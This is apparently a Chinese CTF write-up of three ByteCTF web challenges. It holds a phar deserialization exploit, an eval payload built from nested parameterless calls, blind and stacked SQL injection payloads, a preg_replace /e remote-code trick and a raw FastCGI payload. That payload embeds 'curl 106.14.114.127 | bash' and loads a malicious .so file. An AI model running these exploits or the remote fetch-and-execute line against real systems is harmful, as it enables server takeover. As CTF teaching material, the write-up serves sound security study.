• Bytectf-几道web总结


    1.EZcms

    这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化

    首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess

    这里主要记录一点,利用php内置类进行文件操作,

    exp为:

    <?php
    class File{
        public $filename;
        public $filepath;
        public $checker;
    
        function __construct() {
            $this->checker = new Profile();
        }
    }
    
    class Profile{
    
        public $username;
        public $password;
        public $admin;
    
        function __construct() {
            $this->admin = new ZipArchive;
            $this->username = '/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess';
            $this->password = ZIPARCHIVE::OVERWRITE;
        }
    }
    
    @unlink("test.phar");
    $phar = new Phar("test.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER();?>");
    $o = new File();
    $phar->setMetadata($o);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();

    通过反序列化File类,从而调用Profile类的upload_file函数,此时触发Profile类的call方法,

     

    这里实际调用了open方法,其实Profile类里没有这个方法,所以去内置类中找,并且admin可控为任何内置类,这里用到了Archive::open方法来覆盖写文件,当然这是一个原题的知识点,这里记录一下如何找到它,fuzz的代码如下:

    <?php
    echo "get_declared_classes()"."
    ";
    $a=get_declared_classes();
    foreach($a as $class){
    
      $arr_func=get_class_methods($class);
      echo $class."
    ";
      var_dump($arr_func);
    }

     通过get_declared_classes和get_class_methods方法就能够获得php所有内置类对应的方法,此时只要进行一个简单的字符串匹配,就能找到同名的所需要的函数,以后遇到需要用到内置类的同名方法时也能够进行快速fuzz

    <?php
    #echo "get_declared_classes()"."
    ";
    $a=get_declared_classes();
    foreach($a as $class){
    
      $arr_func=get_class_methods($class);
      foreach($arr_func as $func){
            if($func=="open"){
            echo $class." ".$func."
    ";
    }
    }
    }

     

     其中open函数可以指定覆盖模式,此时第一参数即为要删除的文件名,此时就能够满足对.htaccess文件的删除,后续操作即上传phar文件,利用suctf中

    php://filter/resource=phar://来进行phar反序列化,这里上传shell时会对内容过滤一些常见关键字:

     使用php字符串连接.点绕过即可

    2.Boring code

    <?php
    function is_valid_url($url) {
        if (filter_var($url, FILTER_VALIDATE_URL)) {
            if (preg_match('/data:///i', $url)) {
                return false;
            }
            return true;
        }
        return false;
    }
    
    if (isset($_POST['url'])){
        $url = $_POST['url'];
        if (is_valid_url($url)) {
            $r = parse_url($url);
            if (preg_match('/baidu.com$/', $r['host'])) {
                $code = file_get_contents($url);
                if (';' === preg_replace('/[a-z]+((?R)?)/', NULL, $code)) {
                    if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                        echo 'bye~';
                    } else {
                        eval($code);
                    }
                }
            } else {
                echo "error: host not allowed";
            }
        } else {
            echo "error: invalid url";
        }
    }else{
        highlight_file(__FILE__);
    }

    取$url下的内容传入eval执行,这里过滤了data协议,否则可以通过

    data://baidu.com/plain;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=

    来绕过preg_match的检查,这里目前我知道有三种解决方法:

    1.可以直接购买一个xxxxxbaidu.com的域名

    2.或者利用百度的url跳转

    3.利用百度云自动生成的链接

     这里将直接显示文件完整的链接,此时在php中使用file_get_contents试试:

     此时能够直接对远程文件内容进行获取,也满足了题目baidu.com的条件的限制,此时第一层preg已经可以绕过,

    if (';' === preg_replace('/[a-z]+((?R)?)/', NULL, $code)) 

    这里用到了递归匹配,即最终匹配到的函数调用格式只能是a(b(c())),并且是无参数的

    https://zh.functions-online.com/preg_replace.html

     

    又因为题目的flag已经提示在../index.php,所以要读到这个文件:

    readfile(end(scandir('.')));

    以上一段代码会返回当前文件夹的最后一个文件

    而当前正则不能使用.点,所以要构造出一个.点,

    关键函数1:

    localeconv,函数返回一包含本地数字及货币格式信息的数组。

     

     结合pos函数或者current函数获取数组中的指定元素,默认是第一个元素,当然可以结合next函数返回第二个元素;

     

     因为此时要跨目录,所以需要chdir切换一下目录

     此时可以使用chdir切换目录,但是chdir返回值为1或者0,不能够返回一个.点,因此使用localtime()+time()函数结合起来可以返回1个int数组,此时使用pos()函数获取第一个元素

    即为当前秒数,那么当为每分钟46秒时将结合chr函数返回.点。

     

     所以此时payload已经很明确,为:

    echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

    此时只要将payload放到百度云盘上,并获取此链接,然后再burp重复发包即可,这里也可以使用如下的payload:

    if(chdir(next(scandir(pos(localeconv())))))readfile(end(scandir(pos(localeconv()))));

    利用if(1),从而来执行readfile()函数

    3.BabyBlog

     这道题主要是二次注入,这里主要漏洞点在$content,这里直接使用addslashes进行一个转义

     而在edit.php中,这里直接将存进库中的title数据查出来并拼接到update语句中,所以这里明显存在二次注入,脏数据没有进行过滤,只是进行了入库前的转义,从而导致漏洞的产生,这里引入了config.php来对get和post的参数进行了检测

     注入点在此,并且在replace.php中,这里可以拼接preg_match,并且php的版本为5.3.29,php版本5.4以下都存在%00截断问题,以及结合/e选项进行代码执行

     

     这里$_POST['find']=.*/e%00  $_POST['replace']=phpinfo(); 

    preg_replace("/" . $_POST['find'] . "/", $_POST['replace'], $row['content']

    就能够执行phpinfo();

     而在register.php中,我们已经知道此时注册的用户默认isvip等于0,那么只有通过注入来实现让isvip为1,那么有两种方法:

    1.通过注入来找到数据库中已经存在的isvip为1的用户;

    2.通过注入来将当前我们注册的用户的isvip字段更新为1;

     

    第一种方法:

    第一种方法,貌似不是出题人的主要考点,初始数据库中没有任何用户,第二种方法我觉得才是预期做法,利用PDO在php5.3以后是支持堆叠查询,从而更新当前用户的is_vip字段

    首先注册一个用户,此时可以看到isvip为0,在writing.php页面,因为已经知道注入点在title字段,所以我们此时提交注入的payload,当然在这里本地肯定一定要测试一下payload,能否通过waf检测

    <?php
    $sql = new PDO("mysql:host=localhost;dbname=babyblog", 'root', 'root') or die("SQL Server Down T.T");
    function SafeFilter(&$arr){
            foreach ($arr as $key => $value) {
                    if (!is_array($value)){
                            $filter = "benchmarks*?(.*)|sleeps*?(.*)|load_files*?\(|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|UPDATEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|")|(+|-|~|!|@:=|" . urldecode('%0B') . ").+?)FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
                            if(preg_match('/' . $filter . '/is',$value)){
                          echo  preg_replace('/'.$filter.'/is',"@@@",$value);
                            echo "123";
                            }
    else{
    echo "321";
    }
                    }else{
                            SafeFilter($arr[$key]);
                    }
            }
    }
    $_GET && SafeFilter($_GET);

     本地测试payload:

    1' ^ (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>1) ^'1

    此时select a from b这种形式被过滤了

    但是可以用select(a)from b

     

     综上payload可以更换为:

    1' ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>1)  ^ '1

    此时我们可以测试一下:

     当提交如上payload,即取所有表名连接起来的第一位ascii大于1,此时update的where拼接应该是:

    where title='1' ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>1)  ^ '1'

     此时更新这条blog的title为12345

     此时我们对应的id的title和content将被更新为12345,默认为最新的一条blog,因为此时where条件为1

    那么另一种逻辑为:

    1' ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>200)  ^ '1

     此时edit更新其值是不能成功的,因为where条件为0

     当然在命令行下也是可以验证这种逻辑的,因此基于这种逻辑就能够依次暴库、表、字段,所以编写脚本时只需要注意两点:

    1.在writing.php写payload

    2.在edit.php更新blog,因为需要更新最新的一条为含有payload的blog,而每条blog有对应的id,因此需要正则匹配所有的id号并取列表第一个即为最新的id,此时更改此条id的blog,若当前查的数据ascii为10,payload为<10,则更新成功,依次增大payload中ascii码,直到更新失败,此时ascii-1即为当前查的数据的ascii码值

    基于以上两条即可得到isvip为1的用户的账号和密码,前提是别人已经更新成功isvip为1的用户。

    第二种方法

    第二种采用堆叠注入的形式,直接update当前用户为isvip为1

     payload为:

    tr1ple';SET @SQL=0x757064617465207573657273207365742069737669703d3120776865726520757365726e616d653d22747231706c65223b;PREPARE sql FROM @SQL;EXECUTE sql;# 

    这样就能更新tr1ple用户的isvip为1

     

     并且此时本地测试payload是可以通过的

     

     此时回到数据库中可以看到此时isvip已经为1,那么此时就可以进行第二步了,结合preg_match的%00截断正则匹配表达式,并且此时配合/e参数来进行rce

     

     后面就是常规的套路,绕过openbase_dir和绕过disable_function

    <?php
    $file_list = array();
    // normal files
    $it = new DirectoryIterator("glob:///*");
    foreach($it as $f) {
        $file_list[] = $f->__toString();
    }
    // special files (starting with a dot(.))
    $it = new DirectoryIterator("glob:///.*");
    foreach($it as $f) {
        $file_list[] = $f->__toString();
    }
    sort($file_list);
    foreach($file_list as $f){
            echo "{$f}<br/>";
    }
    ?>

    此时可以用以上代码进行bypass列文件,可以在根目录发现readflag,一般来说肯定要调用readflag来读取flag,所以此时要执行readflag,没有禁用error_log,因此可以使用putenv+error_log来进行bypass diable_function,当然这道题也可以用打php-fpm来绕过openbase_dir和disable_function

    $fp = stream_socket_client("套接字地址", $errno, $errstr,30);
    $out = urldecode("%01%01%1C%AE%00%08%00%00%00%01%00%00%00%00%00%00%01%04%1C%AE%01%DC%00%00%0E%02CONTENT_LENGTH51%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%17PHP_ADMIN_VALUEextension%20%3D%20/tmp/sky.so%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%1C%AE%00%00%00%00%01%05%1C%AE%003%00%00%3C%3Fphp%20hello_world%28%27curl%20106.14.114.127%20%7C%20bash%27%29%3B%20%3F%3E%01%05%1C%AE%00%00%00%00");
    stream_socket_sendto($fp,$out);
    while (!feof($fp))
    {echo htmlspecialchars(fgets($fp, 10)); }fclose($fp);

    这里可以直接与目标unix 套接字进行通信,其中变量$out即为发送到目标套接字的地址,payload可以根据p牛的python脚本进行更改,改为只输入payload不发出payload,此时再通过此执行此php文件来

    php_value = "allow_url_include = On
    safe_mode = Off
    open_basedir = /
    extension_dir = /tmp
    extension = tr1ple.so
    auto_prepen_file=php://input

    这样我们就可以上传该exp文件,并且上传so文件到tmp目录,然后打php-fpm,只需要php://input中结putenv+errorlog即可进行rce

  • 相关阅读:
    关于final shell
    vue axios 赋值后console可以查看到 html调用数据失败
    递归计数
    中国用户也能同步 Chrome 书签了
    Linux基础知识(CentOS7)
    问题关键词
    「工具推荐」golang 代码可视化工具 gocallvis
    php统一的gocheck方法
    激光原理与技术第七章
    小码哥汇编
  • 原文地址:https://www.cnblogs.com/tr1ple/p/11527392.html
Copyright © 2020-2023  润新知